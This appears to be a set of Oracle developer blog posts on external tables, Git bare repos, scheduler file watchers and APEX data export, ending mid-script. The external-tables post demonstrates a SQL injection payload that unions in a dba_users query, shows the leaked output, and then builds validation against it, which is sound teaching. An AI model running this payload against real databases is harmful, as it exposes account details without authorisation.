select sys_context('userenv', 'is_application_root') as is_application_root from dual;
IS_APPLICATION_ROOT
--------------------
NO
select sys_context('userenv', 'is_application_pdb') as is_application_pdb from dual;
IS_APPLICATION_PDB
--------------------
NO
CDB_DOMAIN has also made an appearance in this version :
select sys_context('userenv', 'cdb_domain') as cdb_domain from dual;
CDB_DOMAIN
--------------------
CLOUD_SERVICE is still kicking around :
select sys_context('userenv', 'cloud_service') as cloud_service from dual;
CLOUD_SERVICE
--------------------
I’ve submitted comments on the appropriate documentation pages but I can’t see any way to track the response or progress on these.
Fortunately, for me, my friendly neighbourhood marsupial has now got this covered, but it’s something you may want to keep an eye out for if you maintain you’re own list of Userenv Parameters.
Creating a central Repository using Git Bare
When working in a large IT department, there are times when you feel a bit like a Blue Peter presenter.
For example, there may be a requirement to colloborate with other programmers on a project but, for whatever reason, you do not have access to a hosting platform ( Github, Bitbucket, Gitlab – pick you’re favourite).
What you do have is a network share to which you all have access, and Git installed locally on each of your machines.
This can be thought of as the technical equivalent of an empty washing-up bottle, a couple of loo rolls and some sticky back plastic.
Fortunately, this represents the raw materials required to construct a Tracey Island or – in this case – a Bare Git Repo to act as the main repository for the project…
The Repository we want to share looks like this :
To create the main repository on the share, we can open a command window and create the directory to hold the repository on the share ( which is mapped to Z:\ in my case) :
mkdir z:\blue_peter
…then navigate to the new directory and create a Bare Repo …
git init --bare
You can then populate the repo with the existing project.
git remote add origin z:\blue_peter
git push origin main
NOTE – it could be because I was doing this on a VM, but when I first ran the push, I got an error about the ownership of the shared directory :
This can be solved by running :
git config --global --add safe.directory z:blue_peter
Looking at the files in our new main repo, we can see that it’s not shown as individual files, as you’d expect in a normal repo :
However, we can access the contents via Git in the normal way.
For example, I can now clone the repository to a different location. In real-life this would be a completely different client, but I’ve run out of VMs !
git clone z:\blue_peter
Side Note – Once again, I hit the dubious ownership issue :
Anyhow, we can see the files as usual in the cloned repo :
…and the repository now behaves as expected. If we make a change and push it…
We can pull the repo in another “client” :
After all that, I think you’ve earned a Blue Peter Badge.
Oracle External Tables and the External Modify Clause
I like to think that I’m not completely useless in the kitchen. A pinch of this, a dash of that and a glug of what you fancy ( which may or may not make it’s way into whatever I’m cooking) and the result is usually edible at least.
That said, the combination of precise quantities of substances by means of closely controlled chemical reactions is more Deb’s forte.
The result is usually delicious. Being traditionalists in our house, we do like to follow the time-honoured bake-off format and have a judging session of the finished article. We think of it as the Great British Cake Scoff.
However satisfying the act of culinary creation may be, there are times when you just want something you need to stick in the microwave for 2 minutes.
Which brings us to the matter of Oracle External Tables.
When they first arrived, External Tables provided an easy way to load data from a file directly into the database without all that messing about with SQL*Loader.
Of course, there were some limitations. If you wanted to point an external table at a file, you’d have to issue an alter table statement to set it ( and possibly the directory as well).
This meant that External Table access had to be serialized to ensure that it was pointed at the correct file until you were finished with it.
If you find yourself switching between Oracle versions, it’s worth remembering that, these days, things are a little different, thanks to the EXTERNAL MODIFY, which arrived in 12c.
What I’ll be looking at here is whether External tables can now be used concurrently in different sessions, accessing different files.
I’ll also explore the EXTERNAL MODIFY clause’s aversion to bind variables and how we might work around this securely in PL/SQL.
The ApplicationThe examples that follow were run on an Oracle Developer Day Virtual Box instance running Oracle 19.3.
We have a directory…
create or replace directory recipies_dir as '/u01/app/recipies';
…which contains some text files…
ls -1
debs_lemon_drizzle_cake.txt
mikes_beans_on_toast.txt
…and a simple external table to read files…
create table nom_nom_xt
(
line number,
text varchar2(4000)
)
organization external
(
type oracle_loader
default directory upload_files
access parameters
(
records delimited by newline
nologfile
nobadfile
nodiscardfile
fields terminated by '~'
missing field values are null
(
line recnum,
text char(4000)
)
)
location('')
)
reject limit unlimited
/
You’ll notice that I’ve specified the default directory as this is mandatory. However the location (i.e. the target file) is currently null.
Now, in the olden days, we’d have to issue a DDL statement to set the location before we could look at a file.
Since 12c however, we have the EXTERNAL MODIFY clause, so we can do this directly in a query :
select text
from nom_nom_xt
external modify
(
default directory recipies_dir
location('mikes_beans_on_toast.txt')
)
/
Alternatively…
select text
from nom_nom_xt
external modify
(
location(recipies_dir:'debs_lemon_drizzle_cake.txt')
)
/
After running these statments, we can see that the EXTERNAL MODIFY clause has had no effect on the table definition itself :
select directory_name, location
from user_external_locations
where table_name = 'NOM_NOM_XT';
Looking at the EXTERNAL MODIFY clause, it would seem that External Tables should now behave like Global Temporary Tables in that, whilst their structure is permanent, the data they contain is session specific.
Let’s put that to the test.
First of all, I’m going to take advantage of the fact I’m on Linux ( Oracle Linux Server 7.6 since you ask) and generate a text file from /usr/share/dict/words – a file that contains a list of words.
In the recipies directory on the os :
for i in {1..100}; do cat /usr/share/dict/words >>alphabet_soup.txt; done
cat alphabet_soup.txt >alphabetty_spaghetti.txt
I now have two rather chunky text files :
ls -lh alphabet*
-rw-r--r--. 1 oracle oinstall 473M May 27 14:25 alphabet_soup.txt
-rw-r--r--. 1 oracle oinstall 473M May 27 14:26 alphabetty_spaghetti.txt
…containing just under 48 million lines each…
cat alphabet_soup.txt |wc -l
47982800
Using the single external table, I’m going to load each file into a separate table in separate sessions.
The script for session 1 is :
set worksheetname Soup
column start_time format a10
column end_time format a10
-- Check that this is a different session from "session 2"
select sys_context('userenv', 'sessionid') from dual;
-- Give me time to switch sessions and start the other script
exec dbms_session.sleep(2);
select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;
set timing on
create table alphabet_soup as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabet_soup.txt'));
set timing off
select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;
select count(*) from alphabet_soup;
In session 2 :
set worksheetname Spaghetti
column start_time format a10
column end_time format a10
-- Check that this is a different session from "session 1"
select sys_context('userenv', 'sessionid') from dual;
select to_char(sysdate, 'HH24:MI:SS') as start_time from dual;
set timing on
create table alphabetty_spaghetti as
select *
from nom_nom_xt external modify( default directory recipies_dir location('alphabetty_spaghetti.txt'));
set timing off
select to_char(sysdate, 'HH24:MI:SS') as end_time from dual;
select count(*) from alphabetty_spaghetti;
Note – the set worksheetname command is SQLDeveloper specific.
The results are…
Session 1 (Soup)SYS_CONTEXT('USERENV','SESSIONID')Session 2 (Spaghetti)
------------------------------------
490941
PL/SQL procedure successfully completed.
START_TIME
----------
14:45:08
Table ALPHABET_SOUP created.
Elapsed: 00:01:06.199
END_TIME
----------
14:46:15
COUNT(*)
----------
47982800
SYS_CONTEXT('USERENV','SESSIONID')
-----------------------------------
490942
START_TIME
----------
14:45:09
Table ALPHABETTY_SPAGHETTI created.
Elapsed: 00:01:08.043
END_TIME
----------
14:46:17
COUNT(*)
----------
47982800
As we can see, the elapsed time is almost identical in both sessions. More importantly, both sessions’ CTAS statements finished within a couple of seconds of each other.
Therefore, we can conclude that both sessions accessed the External Table in parallel.
Whilst this does represent a considerable advance in the utility of External Tables, there is something of a catch when it comes to using them to access files via SQL*Plus…
Persuading EXTERNAL MODIFY to eat it’s greensA common use case for External Tables tends to be ETL processing. In such circumstances, the name of the file being loaded is likely to change frequently and so needs to be specified at runtime.
It’s also not unusual to have an External Table that you want to use on more than one directory ( e.g. as a log file viewer).
On the face of it, the EXTERNAL MODIFY clause should present no barrier to use in PL/SQL :
clear screen
set serverout on
begin
for r_line in
(
select text
from nom_nom_xt external modify ( default directory recipies_dir location ('debs_lemon_drizzle_cake.txt') )
)
loop
dbms_output.put_line(r_line.text);
end loop;
end;
/
Whilst this works with no problems, look what happens when we try to use a variable to specify the filename :
clear screen
set serverout on
declare
v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
begin
for r_line in
(
select text
from nom_nom_xt
external modify
(
default directory recipies_dir
location (v_file)
)
)
loop
dbms_output.put_line(r_line.text);
end loop;
end;
/
ORA-06550: line 7, column 90:
PL/SQL: ORA-00905: missing keyword
Specifying the directory in a variable doesn’t work either :
declare
v_dir varchar2(4000) := 'recipies_dir';
begin
for r_line in
(
select text
from nom_nom_xt
external modify
(
default directory v_dir
location ('debs_lemon_drizzle_cake.txt')
)
)
loop
dbms_output.put_line(r_line.text);
end loop;
end;
/
ORA-06564: object V_DIR does not exist
Just in case you’re tempted to solve this by doing something simple like :
clear screen
set serverout on
declare
v_dir all_directories.directory_name%type := 'recipies_dir';
v_file varchar2(100) := 'mikes_beans_on_toast.txt';
v_stmnt clob :=
q'[
select text
from nom_nom_xt external modify( default directory <dir> location('<file>'))
]';
v_rc sys_refcursor;
v_text varchar2(4000);
begin
v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
open v_rc for v_stmnt;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line(v_text);
end loop;
close v_rc;
end;
/
You should be aware that this approach is vulnerable to SQL Injection.
I know that it’s become fashionable in recent years for “Security” to be invoked as a reason for all kinds of – often questionable – restrictions on the hard-pressed Software Engineer.
So, just in case you’re sceptical about this, here’s a quick demo :
clear screen
set serverout on
declare
v_dir varchar2(500) :=
q'[recipies_dir location ('mikes_beans_on_toast.txt')) union all select username||' '||account_status||' '||authentication_type from dba_users --]';
v_file varchar2(100) := 'mikes_beans_on_toast.txt';
v_stmnt varchar2(4000) := q'[select text from nom_nom_xt external modify (default directory <dir> location ('<file>'))]';
v_rc sys_refcursor;
v_text varchar2(4000);
begin
v_stmnt := replace(replace(v_stmnt, '<dir>', v_dir), '<file>', v_file);
open v_rc for v_stmnt;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line(v_text);
end loop;
close v_rc;
end;
/
bread
baked beans
butter
SYS OPEN PASSWORD
SYSTEM OPEN PASSWORD
XS$NULL EXPIRED & LOCKED PASSWORD
HR OPEN PASSWORD
...snip...
PL/SQL procedure successfully completed.
If we resort to Dynamic SQL, we can pass the filename into the query as a bind variable :
set serverout on
declare
v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
v_stmnt clob :=
'select text from nom_nom_xt external modify( default directory recipies_dir location (:v_file))';
v_rc sys_refcursor;
v_text varchar2(4000);
v_rtn number;
begin
open v_rc for v_stmnt using v_file;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line( v_text);
end loop;
close v_rc;
end;
/
…or, if you prefer…
clear screen
set serverout on
declare
v_file varchar2(120) := 'debs_lemon_drizzle_cake.txt';
v_stmnt clob := q'[select text from nom_nom_xt external modify( default directory recipies_dir location (:b1))]';
v_rc sys_refcursor;
v_text varchar2(4000);
v_curid number;
v_rtn number;
begin
v_curid := dbms_sql.open_cursor;
dbms_sql.parse(v_curid, v_stmnt, dbms_sql.native);
dbms_sql.bind_variable(v_curid, 'b1', v_file);
v_rtn := dbms_sql.execute(v_curid);
v_rc := dbms_sql.to_refcursor(v_curid);
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line( v_text);
end loop;
close v_rc;
end;
/
225g unsalted butter
225g caster sugar
4 free-range eggs
225g self-raising flour
1 unwaxed lemon
85g icing sugar
PL/SQL procedure successfully completed.
However, Oracle remains rather recalcitrant when you try doing the same with the default directory.
RTFM RTOB ( Read the Oracle Base article) !After a number of “glugs” from a bottle of something rather expensive whilst trawling through the Oracle Documentation for some clues, I happened to look at the Oracle Base article on this topic which notes that you cannot use bind variables when specifying the Default Directory.
One possible workaround would be to create one external table for each directory that you want to look at.
Alternatively, we can sanitize the incoming value for the DEFAULT DIRECTORY before we drop it into our query.
To this end, DBMS_ASSERT is not going to be much help.
The SQL_OBJECT_NAME function does not recognize Directory Objects…
select dbms_assert.sql_object_name('recipies_dir') from dual;
ORA-44002: invalid object name
… and the SIMPLE_SQL_NAME function will allow pretty much anything if it’s quoted…
select dbms_assert.simple_sql_name(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]')
from dual;
DBMS_ASSERT.SIMPLE_SQL_NAME(Q'["RECIPIES_DIRLOCATION('MIKES_BEANS_ON_TOAST.TXT'))UNIONALLSELECTUSERNAMEFROMDBA_USERS--"]')
---------------------------------------------------------------------------
"recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"
Time then, to unplug the microwave and cook up something home-made…
I’m running on 19c so I know that :
- A directory object name should be a maximum of 128 characters long
- the name will conform to the Database Object Naming Rules
Additionally, I’m going to assume that we’re following Oracle’s recommendation that quoted identifiers are not used for database object names (including Directories). You can find that pearl of wisdom in the page linked above.
Finally, I want to make sure that a user only accesses a valid directory object on which they have appropriate permissions.
Something like this should get us most of the way :
set serverout on
clear screen
declare
v_dir varchar2(4000) := 'recipies_dir';
v_file varchar2(4000) := 'debs_lemon_drizzle_cake.txt';
v_stmnt clob :=
'select text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
v_rc sys_refcursor;
v_text varchar2(4000);
v_rtn number;
v_placeholder pls_integer;
v_found_dir boolean;
cursor c_valid_dir is
select null
from all_directories
where directory_name = upper(v_dir);
begin
if length( v_dir) > 128 then
raise_application_error(-20101, 'Directory Identifier is too long');
end if;
-- Assume allowable characters are alphanumeric and underscore. Reject if it contains anything else
if regexp_instr(replace(v_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
raise_application_error(-20110, 'Directory Name contains wacky characters');
end if;
open c_valid_dir;
fetch c_valid_dir into v_placeholder;
v_found_dir := c_valid_dir%found;
close c_valid_dir;
if v_found_dir = false then
raise_application_error(-20120, 'Directory not found');
end if;
v_stmnt := replace(v_stmnt, '<dir>', v_dir);
open v_rc for v_stmnt using v_file;
loop
fetch v_rc into v_text;
exit when v_rc%notfound;
dbms_output.put_line( v_text);
end loop;
close v_rc;
end;
/
We can now convert this into an Invoker’s rights package, that should restrict access to directories visible by the calling user :
create or replace package peckish
authid current_user
as
type t_nom is table of varchar2(4000);
procedure validate_directory(i_dir in varchar2);
function recipe( i_dir in varchar2, i_file in varchar2)
return t_nom pipelined;
end peckish;
/
create or replace package body peckish as
procedure validate_directory( i_dir in varchar2)
is
v_placeholder pls_integer;
v_found_dir boolean;
cursor c_valid_dir is
select null
from all_directories
where directory_name = upper(i_dir);
begin
if length( i_dir) > 128 then
raise_application_error(-20101, 'Directory Identifier is too long');
end if;
if regexp_instr(replace(i_dir, '_'), '[[:punct:]]|[[:space:]]') > 0 then
raise_application_error(-20110, 'Directory Name contains wacky characters');
end if;
open c_valid_dir;
fetch c_valid_dir into v_placeholder;
v_found_dir := c_valid_dir%found;
close c_valid_dir;
if v_found_dir = false then
raise_application_error(-20120, 'Directory not found');
end if;
end validate_directory;
function recipe( i_dir in varchar2, i_file in varchar2)
return t_nom pipelined
is
v_nom nom_nom_xt%rowtype;
v_stmnt clob :=
'select line, text from nom_nom_xt external modify( default directory <dir> location (:v_file))';
v_rc sys_refcursor;
v_text varchar2(4000);
begin
validate_directory(i_dir);
v_stmnt := replace(v_stmnt, '<dir>', i_dir);
open v_rc for v_stmnt using i_file;
loop
fetch v_rc into v_nom.line, v_nom.text;
exit when v_rc%notfound;
pipe row( v_nom);
end loop;
close v_rc;
end recipe;
end peckish;
/
Let’s run some tests :
select line as line_no, text as ingredient
from table(peckish.recipe('recipies_dir', 'debs_lemon_drizzle_cake.txt'))
/
LINE_NO INGREDIENT
---------- ----------------------------------------
1 225g unsalted butter
2 225g caster sugar
3 4 free-range eggs
4 225g self-raising flour
5 1 unwaxed lemon
6 85g icing sugar
6 rows selected.
select text as ingredient
from table (
peckish.recipe(
'this_is_a_very_long_identifier_to_check_that_the_length_restriction_works_as_expected._Is_that_128_characters_yet_?_Apparently_not_Oh_well_lets_keep_going_for_a_bit',
'mikes_beans_on_toast.txt'
))
/
ORA-20101: Directory Identifier is too long
select text as ingredient
from table(
peckish.recipe
(
q'["recipies_dir location('mikes_beans_on_toast.txt')) union all select username from dba_users --"]',
'debs_lemon_drizzle_cake.txt'
))
/
ORA-20110: Directory Name contains wacky characters
select text as ingredient
from table (peckish.recipe('super_secret_dir', 'mikes_beans_on_toast.txt'))
/
ORA-20120: Directory not found
All of which has left me feeling rather in the mood for a snack. I wonder if there’s any of that cake left ?
Freddie Starr Ate My File ! Finding out exactly what the Oracle Filewatcher is up to
As useful as they undoubtedly are, any use of a DBMS_SCHEDULER File Watchers in Oracle is likely to involve a number of moving parts.
This can make trying to track down issues feel a bit like being on a hamster wheel.
Fortunately, you can easily find out just exactly what the filewatcher is up to, if you know where to look …
I’ve got a procedure to populate a table with details of any arriving file.
create table incoming_files(
destination VARCHAR2(4000),
directory_path VARCHAR2(4000),
actual_file_name VARCHAR2(4000),
file_size NUMBER,
file_timestamp TIMESTAMP WITH TIME ZONE)
/
create or replace procedure save_incoming_file( i_result sys.scheduler_filewatcher_result)
as
begin
insert into incoming_files(
destination,
directory_path,
actual_file_name,
file_size,
file_timestamp)
values(
i_result.destination,
i_result.directory_path,
i_result.actual_file_name,
i_result.file_size,
i_result.file_timestamp);
end;
/
The filewatcher and associated objects that will invoke this procedure are :
begin
dbms_credential.create_credential
(
credential_name => 'starr',
username => 'fstarr',
password => 'some-complex-password'
);
end;
/
begin
dbms_scheduler.create_file_watcher(
file_watcher_name => 'freddie',
directory_path => '/u01/app/upload_files',
file_name => '*.txt',
credential_name => 'starr',
enabled => false,
comments => 'Feeling peckish');
end;
/
begin
dbms_scheduler.create_program(
program_name => 'snack_prog',
program_type => 'stored_procedure',
program_action => 'save_incoming_file',
number_of_arguments => 1,
enabled => false);
-- need to make sure this program can see the message sent by the filewatcher...
dbms_scheduler.define_metadata_argument(
program_name => 'snack_prog',
metadata_attribute => 'event_message',
argument_position => 1);
-- Create a job that links the filewatcher to the program...
dbms_scheduler.create_job(
job_name => 'snack_job',
program_name => 'snack_prog',
event_condition => null,
queue_spec => 'freddie',
auto_drop => false,
enabled => false);
end;
/
The relevant components have been enabled :
begin
dbms_scheduler.enable('freddie');
dbms_scheduler.enable('snack_prog');
dbms_scheduler.enable('snack_job');
end;
/
… and – connected on the os as fstarr – I’ve dropped a file into the directory…
echo 'Squeak!' >/u01/app/upload_files/hamster.txt
Watching the (File)Watcher
File watchers are initiated by a scheduled run of the SYS FILE_WATCHER job.
The logging_level value determines whether or not the executions of this job will be available in the *_SCHEDULER_JOB_RUN_DETAILS views.
select program_name, schedule_name,
job_class, logging_level
from dba_scheduler_jobs
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
/
PROGRAM_NAME SCHEDULE_NAME JOB_CLASS LOGGING_LEVEL
-------------------- ------------------------- ----------------------------------- ---------------
FILE_WATCHER_PROGRAM FILE_WATCHER_SCHEDULE SCHED$_LOG_ON_ERRORS_CLASS FULL
If the logging_level is set to OFF (which appears to be the default in 19c), you can enable it by connecting as SYSDBA and running :
begin
dbms_scheduler.set_attribute('FILE_WATCHER', 'logging_level', dbms_scheduler.logging_full);
end;
/
The job is assigned the FILE_WATCHER_SCHEDULE, which runs every 10 minutes by default. To check the current settings :
select repeat_interval
from dba_scheduler_schedules
where schedule_name = 'FILE_WATCHER_SCHEDULE'
/
REPEAT_INTERVAL
------------------------------
FREQ=MINUTELY;INTERVAL=10
The thing is, there are times when the SYS.FILE_WATCHER seems to slope off for a tea-break. So, if you’re wondering why your file has not been processed yet, it’s handy to be able to check if this job has run when you expected it to.
In this case, as logging is enabled, we can do just that :
select log_id, log_date, instance_id, req_start_date, actual_start_date
from dba_scheduler_job_run_details
where owner = 'SYS'
and job_name = 'FILE_WATCHER'
and log_date >= sysdate - (1/24)
order by log_date desc
/
LOG_ID LOG_DATE INSTANCE_ID REQ_START_DATE ACTUAL_START_DATE
------- ----------------------------------- ----------- ------------------------------------------ ------------------------------------------
1282 13-APR-24 14.50.47.326358000 +01:00 1 13-APR-24 14.50.47.000000000 EUROPE/LONDON 13-APR-24 14.50.47.091753000 EUROPE/LONDON
1274 13-APR-24 14.40.47.512172000 +01:00 1 13-APR-24 14.40.47.000000000 EUROPE/LONDON 13-APR-24 14.40.47.075846000 EUROPE/LONDON
1260 13-APR-24 14.30.47.301176000 +01:00 1 13-APR-24 14.30.47.000000000 EUROPE/LONDON 13-APR-24 14.30.47.048977000 EUROPE/LONDON
1248 13-APR-24 14.20.47.941210000 +01:00 1 13-APR-24 14.20.47.000000000 EUROPE/LONDON 13-APR-24 14.20.47.127769000 EUROPE/LONDON
1212 13-APR-24 14.10.48.480193000 +01:00 1 13-APR-24 14.10.47.000000000 EUROPE/LONDON 13-APR-24 14.10.47.153032000 EUROPE/LONDON
1172 13-APR-24 14.00.50.676270000 +01:00 1 13-APR-24 14.00.47.000000000 EUROPE/LONDON 13-APR-24 14.00.47.111936000 EUROPE/LONDON
6 rows selected.
Even if the SYS.FILE_WATCHER is not logging, when it does run, any files being watched for are added to a queue, the contents of which can be found in SCHEDULER_FILEWATCHER_QT.
This query will get you the really useful details of what your filewatcher has been up to :
select
t.step_no,
treat( t.user_data as sys.scheduler_filewatcher_result).actual_file_name as filename,
treat( t.user_data as sys.scheduler_filewatcher_result).file_size as file_size,
treat( t.user_data as sys.scheduler_filewatcher_result).file_timestamp as file_ts,
t.enq_time,
x.name as filewatcher,
x.requested_file_name as search_pattern,
x.credential_name as credential_name
from sys.scheduler_filewatcher_qt t,
table(t.user_data.matching_requests) x
where enq_time > trunc(sysdate)
order by enq_time
/
STEP_NO FILENAME FILE_SIZE FILE_TS ENQ_TIME FILEWATCHER SEARCH_PATTERN CREDENTIAL_NAME
---------- --------------- ---------- -------------------------------- ---------------------------- --------------- --------------- ---------------
0 hamster.txt 8 13-APR-24 12.06.58.000000000 GMT 13-APR-24 12.21.31.746338000 FREDDIE *.txt STARR
Happily, in this case, our furry friend has avoided the Grim Squaker…
NOTE – No hamsters were harmed in the writing of this post.
If you think I’m geeky, you should meet my friend.
I’d like to talk about a very good friend of mine.
Whilst he’s much older than me ( 11 or 12 weeks at least), we do happen to share interests common to programmers of a certain vintage.
About a year ago, he became rather unwell.
Since then, whenever I’ve gone to visit, I’ve taken care to wear something that’s particular to our friendship and/or appropriately geeky.
At one point, when things were looking particularly dicey, I promised him, that whilst “Captain Scarlet” was already taken, if he came through he could pick any other colour he liked.
As a life-long Luton Town fan, his choice was somewhat inevitable.
So then, what follows – through the medium of Geeky T-shirts – is a portrait of my mate Simon The Indestructable Captain Orange…
When we first met, Windows 3.1 was still on everyone’s desktop and somewhat prone to hanging at inopportune moments. Therefore, we are fully aware of both the origins and continuing relevance of this particular pearl of wisdom :
Fortunately, none of the machines Simon was wired up to in the hospital seemed to be running any version of Windows so I thought he’d be reassured by this :
Whilst our first meeting did not take place on a World riding through space on the back of a Giant Turtle ( it was in fact, in Milton Keynes), Simon did earn my eternal gratitude by recommending the book Good Omens – which proved to be my gateway to Discworld.
The relevance of this next item of “Geek Chic” is that, when Simon later set up his own company, he decided that it should have a Latin motto.
In this, he was inspired by the crest of the Ankh-Morpork Assassins’ Guild :
His motto :
Nil codex sine Lucre
…which translates as …
No code without payment
From mottoes to something more akin to a mystic incantation, chanted whenever you’re faced with a seemingly intractable technical issue. Also, Simon likes this design so…
As we both know, there are 10 types of people – those who understand binary and those who don’t…
When confronted by something like this, I am able to recognise that the binary numbers are ASCII codes representing alphanumeric characters. However, I’ve got nothing on Simon, a one-time Assembler Programmer.
Whilst I’m mentally removing my shoes and socks in preparation to translate the message, desperately trying to remember the golden rule of binary maths ( don’t forget to carry the 1), he’ll just come straight out with the answer (“Geek”, in this case).
Saving the geekiest to last, I’m planning to dazzle with this on my next visit :
Techie nostalgia and a Star Wars reference all on the one t-shirt. I don’t think I can top that. Well, not for now anyway.
Using the APEX_DATA_EXPORT package directly from PL/SQL
As Data Warehouse developers, there is frequently a need for us to produce user reports in a variety of formats (ok, Excel).
Often these reports are the output of processes running as part of an unattended batch.
In the past I’ve written about some of the solutions out there for creating csv files and, of course Excel.
The good news is that, since APEX 20.2, Oracle provides the ability to do this out-of-the-box by means of the APEX_DATA_EXPORT PL/SQL package.
The catch is that you need to have an active APEX session to call it.
Which means you need to have an APEX application handy.
Fortunately, it is possible to initiate an APEX session and call this package without going anywhere near the APEX UI itself, as you’ll see shortly.
Specfically what we’ll cover is :
- generating comma-separated (CSV) output
- generating an XLSX file
- using the ADD_AGGREGATE procedure to add a summary
- using the ADD_HIGHLIGHT procedure to apply conditional formatting
- using the GET_PRINT_CONFIG function to apply document-wide styling
Additionally, we’ll explore how to create a suitable APEX Application from a script if one is not already available.
Incidentally, the scripts in this post can be found in this Github Repo.
Before I go any further, I should acknowledge the work of Amirreza Rastandeh, who’s LinkedIn article inspired this post.
A quick word on the Environment I used in these examples – it’s an Oracle supplied VirtualBox appliance running Oracle 23c Free Database and APEX 22.2.
Generating CSV outputAPEX_DATA_EXPORT offers a veritable cornucopia of output formats. However, to begin with, let’s keep things simple and just generate a CSV into a CLOB object so that we can check the contents directly from within a script.
We will need to call APEX_SESSION.CREATE_SESSION and pass it some details of an Apex application in order for this to work so the first thing we need to do is to see if we have such an application available :
select workspace, application_id, page_id, page_name
from apex_application_pages
order by page_id
/
WORKSPACE APPLICATION_ID PAGE_ID PAGE_NAME
------------------------------ -------------- ---------- --------------------
HR_REPORT_FILES 105 0 Global Page
HR_REPORT_FILES 105 1 Home
HR_REPORT_FILES 105 9999 Login Page
As long as we get at least one row back from this query, we’re good to go. Now for the script itself (called csv_direct.sql) :
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
begin
dbms_output.put_line('Getting app details...');
-- We only need the first record returned by this cursor
open c_apex_app;
fetch c_apex_app into v_apex_app;
close c_apex_app;
apex_util.set_workspace(v_apex_app.workspace);
dbms_output.put_line('Creating session');
apex_session.create_session
(
p_app_id => v_apex_app.application_id,
p_page_id => v_apex_app.page_id,
p_username => 'anynameyoulike' -- this parameter is mandatory but can be any string apparently
);
v_stmnt := 'select * from departments';
dbms_output.put_line('Opening context');
v_context := apex_exec.open_query_context
(
p_location => apex_exec.c_location_local_db,
p_sql_query => v_stmnt
);
dbms_output.put_line('Running Report');
v_export := apex_data_export.export
(
p_context => v_context,
p_format => 'CSV', -- patience ! We'll get to the Excel shortly.
p_as_clob => true -- by default the output is saved as a blob. This overrides to save as a clob
);
apex_exec.close( v_context);
dbms_output.put_line(v_export.content_clob);
end;
/
Running this we get :
Getting app details...
Creating session
Opening context
Running Report
DEPARTMENT_ID,DEPARTMENT_NAME,MANAGER_ID,LOCATION_ID
10,Administration,200,1700
20,Marketing,201,1800
30,Purchasing,114,1700
40,Human Resources,203,2400
50,Shipping,121,1500
60,IT,103,1400
70,Public Relations,204,2700
80,Sales,145,2500
90,Executive,100,1700
100,Finance,108,1700
110,Accounting,205,1700
120,Treasury,,1700
130,Corporate Tax,,1700
140,Control And Credit,,1700
150,Shareholder Services,,1700
160,Benefits,,1700
170,Manufacturing,,1700
180,Construction,,1700
190,Contracting,,1700
200,Operations,,1700
210,IT Support,,1700
220,NOC,,1700
230,IT Helpdesk,,1700
240,Government Sales,,1700
250,Retail Sales,,1700
260,Recruiting,,1700
270,Payroll,,1700
PL/SQL procedure successfully completed.
We can get away with using DBMS_OUTPUT as the result set is comparatively small. Under normal circumstances, you’ll probably want to save it into a table ( as in Amirreza’s post), or write it out to a file.
In fact, writing to a file is exactly what we’ll be doing with the Excel output we’ll generate shortly.
First though, what if you don’t have a suitable APEX application lying around…
Creating an APEX application from SQLNOTE – you only need to do this if you do not already have a suitable APEX Application available.
If you do then feel free to skip to the next bit, where we finally start generating XLSX files !
First, we need to check to see if there is an APEX workspace present for us to create the Application in :
select workspace, workspace_id
from apex_workspaces;
If this returns any rows then you should be OK to pick one of the workspaces listed and create your application in that.
Otherwise, you can create a Workspace by connecting to the database as a user with the APEX_ADMINISTRATOR_ROLE and running :
exec apex_instance_admin.add_workspace( p_workspace => 'HR_REPORT_FILES', p_primary_schema => 'HR');
…where HR_REPORT_FILES is the name of the workspace you want to create and HR is a schema that has access to the database objects you want to run your reports against.
Next, following Jeffrey Kemp’s sage advice ,
I can just create and then export an Application on any compatible APEX instance and then simply import the resulting file.
That’s right, it’ll work irrespective of the environment on which the export file is created, as long as it’s a compatible APEX version.
If you need them, the instructions for exporting an APEX application are here.
I’ve just clicked through the Create Application Wizard to produce an empty application using the HR schema and have then exported it to a file called apex22_hr_report_files_app.sql.
To import it, I ran the following script:
begin
apex_application_install.set_workspace('HR_REPORT_FILES');
apex_application_install.generate_application_id;
apex_application_install.generate_offset;
end;
/
@/home/mike/Downloads/apex22_hr_report_files_app.sql
Once it’s run we can confirm that the import was successful :
select application_id, application_name,
page_id, page_name
from apex_application_pages
where workspace = 'HR_REPORT_FILES'
/
APPLICATION_ID APPLICATION_NAME PAGE_ID PAGE_NAME
-------------- -------------------- ---------- --------------------
105 Lazy Reports 0 Global Page
105 Lazy Reports 1 Home
105 Lazy Reports 9999 Login Page
The add_workspace.sql script in the Github Repo executes both the create workspace and application import steps described here.
Right, where were we…
Generating and Excel fileFirst we’ll need a directory object so we can write our Excel file out to disk. So, as a suitably privileged user :
create or replace directory hr_reports as '/opt/oracle/hr_reports';
grant read, write on directory hr_reports to hr;
OK – now to generate our report as an Excel…
set serverout on size unlimited
clear screen
declare
cursor c_apex_app is
select ws.workspace_id, ws.workspace, app.application_id, app.page_id
from apex_application_pages app
inner join apex_workspaces ws
on ws.workspace = app.workspace
order by page_id;
v_apex_app c_apex_app%rowtype;
v_stmnt varchar2(32000);
v_context apex_exec.t_context;
v_export apex_data_export.t_export;
-- File handling variables
v_dir all_directories.directory_name%type := 'HR_REPORTS';
v_fname varchar2(128) := 'hr_departments_reports.xlsx';
v_fh utl_file.file_type;
v_buffer raw(32767);
v_amount integer := 32767;
v_pos integer := 1;
v_length integer;
begin
